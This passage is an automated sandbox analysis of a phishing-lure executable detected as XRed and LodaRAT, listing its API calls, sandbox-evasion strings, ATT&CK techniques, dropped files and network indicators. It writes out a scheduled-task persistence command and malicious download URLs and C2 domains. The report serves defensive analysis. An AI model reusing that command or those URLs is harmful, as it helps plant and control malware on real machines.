                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000C219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,9_2_000C219F
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000C24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,9_2_000C24A9
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000B6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,9_2_000B6B3F
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000B6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,9_2_000B6E4A
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000BF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,9_2_000BF350
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000BFD47 FindFirstFileW,FindClose,9_2_000BFD47
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_0008DD92 GetFileAttributesW,FindFirstFileW,FindClose,9_2_0008DD92
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000BFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,9_2_000BFDD2
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EBE47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,1_2_00EBE47B
                                Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000Jump to behavior
                                Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
                                Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeFile opened: C:\Users\userJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeFile opened: C:\Users\user\AppDataJump to behavior
                                Source: Amcache.hve.21.drBinary or memory string: VMware
                                Source: Amcache.hve.21.drBinary or memory string: VMware Virtual USB Mouse
                                Source: Amcache.hve.21.drBinary or memory string: vmci.syshbin
                                Source: Amcache.hve.21.drBinary or memory string: VMware, Inc.
                                Source: Amcache.hve.21.drBinary or memory string: VMware20,1hbin@
                                Source: Amcache.hve.21.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                                Source: Amcache.hve.21.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                                Source: Amcache.hve.21.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                                Source: ._cache_New PO - Supplier 0202AW-PER2.exe, 00000001.00000002.4543305344.0000000001154000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: Amcache.hve.21.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnN
                                Source: Amcache.hve.21.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                                Source: Synaptics.exe, 00000002.00000002.4055737675.000000000088B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                                Source: Amcache.hve.21.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                                Source: Amcache.hve.21.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                                Source: ._cache_New PO - Supplier 0202AW-PER2.exe, 00000001.00000002.4543305344.0000000001154000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: Amcache.hve.21.drBinary or memory string: vmci.sys
                                Source: Amcache.hve.21.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                                Source: NUHORT.exe, 00000011.00000003.2316979785.0000000001086000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\rV<
                                Source: Amcache.hve.21.drBinary or memory string: vmci.syshbin`
                                Source: Amcache.hve.21.drBinary or memory string: \driver\vmci,\driver\pci
                                Source: NUHORT.exe, 0000001B.00000003.3503230187.00000000017E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                                Source: Amcache.hve.21.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                                Source: Amcache.hve.21.drBinary or memory string: VMware20,1
                                Source: Amcache.hve.21.drBinary or memory string: Microsoft Hyper-V Generation Counter
                                Source: Amcache.hve.21.drBinary or memory string: NECVMWar VMware SATA CD00
                                Source: Amcache.hve.21.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                                Source: Amcache.hve.21.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                                Source: Amcache.hve.21.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                                Source: Amcache.hve.21.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                                Source: Amcache.hve.21.drBinary or memory string: VMware PCI VMCI Bus Device
                                Source: Amcache.hve.21.drBinary or memory string: VMware VMCI Bus Device
                                Source: Amcache.hve.21.drBinary or memory string: VMware Virtual RAM
                                Source: NUHORT.exe, 00000009.00000003.1781576330.00000000017FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\NA
                                Source: Amcache.hve.21.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                                Source: Amcache.hve.21.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeAPI call chain: ExitProcess graph end nodegraph_1-107410
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeAPI call chain: ExitProcess graph end nodegraph_1-109902
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeAPI call chain: ExitProcess graph end nodegraph_1-110716
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeProcess information queried: ProcessInformationJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EF703C BlockInput,1_2_00EF703C
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EA374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,1_2_00EA374E
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00ED46D0 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,1_2_00ED46D0
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_010020B0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,1_2_010020B0
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00ECA937 GetProcessHeap,1_2_00ECA937
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EC8E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00EC8E3C
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EC8E19 SetUnhandledExceptionFilter,1_2_00EC8E19
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_00098E19 SetUnhandledExceptionFilter,9_2_00098E19
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_00098E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00098E3C
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EDBE95 LogonUserW,1_2_00EDBE95
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EA374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,1_2_00EA374E
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EE4B52 SendInput,keybd_event,1_2_00EE4B52
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EE7DD5 mouse_event,1_2_00EE7DD5
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeProcess created: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe "C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe" Jump to behavior
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn QHCPYO.exe /tr C:\Users\user\AppData\Roaming\Windata\NUHORT.exe /sc minute /mo 1
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EDB398 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,1_2_00EDB398
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EDBE31 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,1_2_00EDBE31
                                Source: ._cache_New PO - Supplier 0202AW-PER2.exe, NUHORT.exeBinary or memory string: Shell_TrayWnd
                                Source: ._cache_New PO - Supplier 0202AW-PER2.exe, 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp, NUHORT.exe, 00000009.00000002.1791407269.000000000011E000.00000040.00000001.01000000.0000000B.sdmp, NUHORT.exe, 0000000A.00000002.1834093290.000000000011E000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EC7254 cpuid 1_2_00EC7254
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EC40DA GetSystemTimeAsFileTime,__aulldiv,1_2_00EC40DA
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00F1C146 GetUserNameW,1_2_00F1C146
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00ED2C3C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,1_2_00ED2C3C
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EBE47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,1_2_00EBE47B
                                Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                                Source: Amcache.hve.21.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                                Source: Amcache.hve.21.drBinary or memory string: msmpeng.exe
                                Source: Amcache.hve.21.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                                Source: ._cache_New PO - Supplier 0202AW-PER2.exe, 00000001.00000002.4543305344.0000000001154000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                                Source: Amcache.hve.21.drBinary or memory string: MsMpEng.exe
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct

                                Stealing of Sensitive Information

                                barindex
                                Yara detected LodaRAT
                                Source: Yara matchFile source: Process Memory Space: ._cache_New PO - Supplier 0202AW-PER2.exe PID: 3848, type: MEMORYSTR
                                Source: Yara matchFile source: dump.pcap, type: PCAP
                                Yara detected XRed
                                Source: Yara matchFile source: New PO - Supplier 0202AW-PER2.exe, type: SAMPLE
                                Source: Yara matchFile source: 0.0.New PO - Supplier 0202AW-PER2.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000000.00000000.1681174852.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: New PO - Supplier 0202AW-PER2.exe PID: 6636, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\Documents\~$cache1, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX76FB.tmp, type: DROPPED
                                Source: NUHORT.exe, 0000001B.00000002.3541717095.000000000011E000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 10, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytea
                                Source: NUHORT.exe, 0000001B.00000003.3540024262.00000000049F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81
                                Source: NUHORT.exeBinary or memory string: WIN_XP
                                Source: NUHORT.exe, 00000011.00000003.2306657930.0000000004387000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81=
                                Source: NUHORT.exeBinary or memory string: WIN_XPe
                                Source: NUHORT.exeBinary or memory string: WIN_VISTA
                                Source: NUHORT.exe, 0000000A.00000003.1824899216.0000000004D03000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81y&
                                Source: NUHORT.exeBinary or memory string: WIN_7
                                Source: NUHORT.exe, 00000010.00000003.2071053329.00000000047C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81{
                                Source: NUHORT.exeBinary or memory string: WIN_8
                                Source: Yara matchFile source: Process Memory Space: ._cache_New PO - Supplier 0202AW-PER2.exe PID: 3848, type: MEMORYSTR

                                Remote Access Functionality

                                barindex
                                Yara detected LodaRAT
                                Source: Yara matchFile source: Process Memory Space: ._cache_New PO - Supplier 0202AW-PER2.exe PID: 3848, type: MEMORYSTR
                                Source: Yara matchFile source: dump.pcap, type: PCAP
                                Yara detected XRed
                                Source: Yara matchFile source: New PO - Supplier 0202AW-PER2.exe, type: SAMPLE
                                Source: Yara matchFile source: 0.0.New PO - Supplier 0202AW-PER2.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000000.00000000.1681174852.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: New PO - Supplier 0202AW-PER2.exe PID: 6636, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\Documents\~$cache1, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX76FB.tmp, type: DROPPED
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EF91DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,1_2_00EF91DC
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EF96E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,1_2_00EF96E2
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000C91DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,9_2_000C91DC
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000C96E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,9_2_000C96E2

                                Mitre Att&ck Matrix

                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity Information421
                                Scripting                                		2
                                Valid Accounts                                		11
                                Windows Management Instrumentation                                		421
                                Scripting                                		1
                                Exploitation for Privilege Escalation                                		1
                                Disable or Modify Tools                                		21
                                Input Capture                                		2
                                System Time Discovery                                		Remote Services1
                                Archive Collected Data                                		4
                                Ingress Tool Transfer                                		Exfiltration Over Other Network Medium1
                                System Shutdown/Reboot
                                CredentialsDomains1
                                Replication Through Removable Media                                		2
                                Native API                                		1
                                DLL Side-Loading                                		1
                                DLL Side-Loading                                		1
                                Deobfuscate/Decode Files or Information                                		LSASS Memory1
                                Peripheral Device Discovery                                		Remote Desktop Protocol21
                                Input Capture                                		11
                                Encrypted Channel                                		Exfiltration Over BluetoothNetwork Denial of Service
                                Email AddressesDNS ServerDomain Accounts1
                                Scheduled Task/Job                                		2
                                Valid Accounts                                		1
                                Extra Window Memory Injection                                		21
                                Obfuscated Files or Information                                		Security Account Manager1
                                Account Discovery                                		SMB/Windows Admin Shares3
                                Clipboard Data                                		3
                                Non-Application Layer Protocol                                		Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal AccountsCron1
                                Scheduled Task/Job                                		2
                                Valid Accounts                                		1
                                Software Packing                                		NTDS4
                                File and Directory Discovery                                		Distributed Component Object ModelInput Capture34
                                Application Layer Protocol                                		Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud AccountsLaunchd21
                                Registry Run Keys / Startup Folder                                		21
                                Access Token Manipulation                                		1
                                DLL Side-Loading                                		LSA Secrets38
                                System Information Discovery                                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts12
                                Process Injection                                		1
                                Extra Window Memory Injection                                		Cached Domain Credentials1
                                Query Registry                                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                                Scheduled Task/Job                                		112
                                Masquerading                                		DCSync251
                                Security Software Discovery                                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job21
                                Registry Run Keys / Startup Folder                                		2
                                Valid Accounts                                		Proc Filesystem121
                                Virtualization/Sandbox Evasion                                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt121
                                Virtualization/Sandbox Evasion                                		/etc/passwd and /etc/shadow3
                                Process Discovery                                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
                                Access Token Manipulation                                		Network Sniffing11
                                Application Window Discovery                                		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd12
                                Process Injection                                		Input Capture1
                                System Owner/User Discovery                                		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                                Behavior Graph

                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1580482 Sample: New PO - Supplier 0202AW-PER2.exe Startdate: 24/12/2024 Architecture: WINDOWS Score: 100 57 freedns.afraid.org 2->57 59 xred.mooo.com 2->59 61 4 other IPs or domains 2->61 75 Suricata IDS alerts for network traffic 2->75 77 Found malware configuration 2->77 79 Antivirus detection for URL or domain 2->79 83 19 other signatures 2->83 9 New PO - Supplier 0202AW-PER2.exe 1 6 2->9         started        12 NUHORT.exe 2->12         started        15 EXCEL.EXE 196 64 2->15         started        17 7 other processes 2->17 signatures3 81 Uses dynamic DNS services 57->81 process4 file5 49 ._cache_New PO - S...ier 0202AW-PER2.exe, PE32 9->49 dropped 51 C:\ProgramData\Synaptics\Synaptics.exe, PE32 9->51 dropped 53 C:\ProgramData\Synaptics\RCX76FB.tmp, PE32 9->53 dropped 55 C:\...\Synaptics.exe:Zone.Identifier, ASCII 9->55 dropped 19 Synaptics.exe 623 9->19         started        24 ._cache_New PO - Supplier 0202AW-PER2.exe 2 5 9->24         started        93 Multi AV Scanner detection for dropped file 12->93 95 Machine Learning detection for dropped file 12->95 97 Found API chain indicative of sandbox detection 12->97 26 splwow64.exe 15->26         started        signatures6 process7 dnsIp8 63 docs.google.com 142.250.181.14, 443, 49734, 49735 GOOGLEUS United States 19->63 65 drive.usercontent.google.com 142.250.181.97, 443, 49745, 49746 GOOGLEUS United States 19->65 67 freedns.afraid.org 69.42.215.252, 49739, 80 AWKNET-LLCUS United States 19->67 43 C:\Users\user\Documents\~$cache1, PE32 19->43 dropped 85 Antivirus detection for dropped file 19->85 87 Multi AV Scanner detection for dropped file 19->87 89 Drops PE files to the document folder of the user 19->89 91 Machine Learning detection for dropped file 19->91 28 WerFault.exe 19->28         started        30 WerFault.exe 19->30         started        32 WerFault.exe 19->32         started        69 172.111.138.100, 49747, 49776, 49801 VOXILITYGB United States 24->69 45 C:\Users\user\AppData\Roaming\...45UHORT.exe, PE32 24->45 dropped 47 C:\Users\user\AppData\Local\Temp\QHCPYO.vbs, ASCII 24->47 dropped 34 cmd.exe 24->34         started        37 wscript.exe 24->37         started        file9 signatures10 process11 signatures12 71 Uses schtasks.exe or at.exe to add and modify task schedules 34->71 39 conhost.exe 34->39         started        41 schtasks.exe 34->41         started        73 Windows Scripting host queries suspicious COM object (likely to drop second stage) 37->73 process13

                                Screenshots

                                Thumbnails

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand

                                Antivirus, Machine Learning and Genetic Malware Detection

                                Initial Sample

                                SourceDetectionScannerLabelLink
                                New PO - Supplier 0202AW-PER2.exe92%ReversingLabsWin32.Trojan.Synaptics
                                New PO - Supplier 0202AW-PER2.exe100%AviraTR/Dldr.Agent.SH
                                New PO - Supplier 0202AW-PER2.exe100%AviraW2000M/Dldr.Agent.17651006
                                New PO - Supplier 0202AW-PER2.exe100%Joe Sandbox ML

                                Dropped Files

                                SourceDetectionScannerLabelLink
                                C:\Users\user\Documents\~$cache1100%AviraTR/Dldr.Agent.SH
                                C:\Users\user\Documents\~$cache1100%AviraW2000M/Dldr.Agent.17651006
                                C:\Users\user\AppData\Local\Temp\QHCPYO.vbs100%AviraVBS/Runner.VPJI
                                C:\ProgramData\Synaptics\Synaptics.exe100%AviraTR/Dldr.Agent.SH
                                C:\ProgramData\Synaptics\Synaptics.exe100%AviraW2000M/Dldr.Agent.17651006
                                C:\ProgramData\Synaptics\RCX76FB.tmp100%AviraTR/Dldr.Agent.SH
                                C:\ProgramData\Synaptics\RCX76FB.tmp100%AviraW2000M/Dldr.Agent.17651006
                                C:\Users\user\Documents\~$cache1100%Joe Sandbox ML
                                C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe100%Joe Sandbox ML
                                C:\ProgramData\Synaptics\Synaptics.exe100%Joe Sandbox ML
                                C:\ProgramData\Synaptics\RCX76FB.tmp100%Joe Sandbox ML
                                C:\Users\user\AppData\Roaming\Windata\NUHORT.exe100%Joe Sandbox ML
                                C:\ProgramData\Synaptics\Synaptics.exe92%ReversingLabsWin32.Trojan.Synaptics
                                C:\Users\user\AppData\Roaming\Windata\NUHORT.exe50%ReversingLabsWin32.Trojan.Lisk
                                C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe50%ReversingLabsWin32.Trojan.Lisk

                                Unpacked PE Files

                                No Antivirus matches

                                Domains

                                No Antivirus matches

                                URLs

                                SourceDetectionScannerLabelLink
                                https://docs.google.comuc?id=0BxsMXGfPIZfSVlVs0%Avira URL Cloudsafe
                                http://xred.site50.net/syn/SSLLibrary.dl100%Avira URL Cloudmalware
                                http://xred.site50.net/syn/Synaptics.rar8100%Avira URL Cloudmalware
                                http://xred.site50.net/syn/SSLLibrary.dll100%Avira URL Cloudmalware
                                http://xred.site50.net/syn/Synaptics.rar100%Avira URL Cloudmalware
                                https://docs.google0%Avira URL Cloudsafe
                                http://xred.site50.net/syn/SUpdate.ini100%Avira URL Cloudmalware

                                Domains and IPs

                                Contacted Domains

                                NameIPActiveMaliciousAntivirus DetectionReputation
                                freedns.afraid.org
                                		69.42.215.252
                                		truefalse
                                  		high
                                  docs.google.com
                                  		142.250.181.14
                                  		truefalse
                                    		high
                                    drive.usercontent.google.com
                                    		142.250.181.97
                                    		truefalse
                                      		high
                                      s-part-0035.t-0009.t-msedge.net
                                      		13.107.246.63
                                      		truefalse
                                        		high
                                        xred.mooo.com
                                        		unknown
                                        		unknownfalse
                                          		high

                                          Contacted URLs

